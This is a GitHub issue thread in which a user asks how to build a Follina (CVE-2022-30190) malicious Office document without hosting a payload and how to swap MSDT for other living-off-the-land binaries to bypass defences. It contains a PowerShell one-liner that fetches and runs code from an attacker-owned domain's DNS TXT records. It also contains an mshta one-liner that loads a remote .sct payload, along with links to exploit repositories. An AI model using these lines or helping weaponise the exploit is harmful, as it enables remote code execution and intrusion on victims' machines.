Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Follina #16

Open
hastalamuerte opened this issue Apr 29, 2023 · 1 comment
Open

Follina #16

hastalamuerte opened this issue Apr 29, 2023 · 1 comment

Comments

@hastalamuerte
Copy link

hastalamuerte commented Apr 29, 2023

Hello @klezVirus thanks for you work, and your tools!

How to build follina doc without hosting, just with command/payload file (ps1, raw, txt..)

#maybe it can be useful https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed
Here is function to use real doc.

dinvoke, directl syscalls or method to get payload from dns records
#"powershell . (nslookup -q=txt some.owned.domain.com)[-1]"
#(nslookup -q=txt # some.owned.domain.com)[-1]"?
https://github.com/rtfmkiesel/goldig (cool)

#https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
Rtf no click (folder visit)

And main question is
Using another service not mstd
https://lolbas-project.github.io/#
List of em who can execute and bypass some.

@hastalamuerte
Copy link
Author

hastalamuerte commented May 1, 2023

IMG_20230501_052512.jpg

Seems its possible

nandisec/mshta@909383b
Oneliner - mshta.exe vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant